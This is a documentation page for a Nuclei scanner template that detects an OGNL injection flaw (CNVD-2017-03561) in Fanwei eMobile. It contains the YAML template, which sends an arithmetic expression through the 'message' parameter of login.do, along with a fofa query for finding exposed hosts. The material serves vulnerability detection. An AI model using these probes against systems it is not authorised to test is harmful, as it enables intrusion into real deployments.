Skip to content
Nuclei Templates

Fanwei eMobile - OGNL Injection

ID: CNVD-2017-03561

Severity: high

Author: ritikchaddha

Tags: cnvd,cnvd2017,emobile,ognl,fanwei

Description

Section titled “Description”

Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CNVD-2017-03561


info:
  name: Fanwei eMobile - OGNL Injection
  author: ritikchaddha
  severity: high
  description: |
    Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
  reference:
    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
    - https://reconshell.com/vulnerability-research-list/
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="泛微-eMobile"
  tags: cnvd,cnvd2017,emobile,ognl,fanwei
variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
      - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100915d6a6aa1cb3c85d0d1635cba0354995d6b54d3e705fcd98e7cef07eb91859e0220304c989457dc6f099e029316b226e05223c8511c1342a943cd022cf3f2e0f37f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2017/CNVD-2017-03561.yaml"

View on Github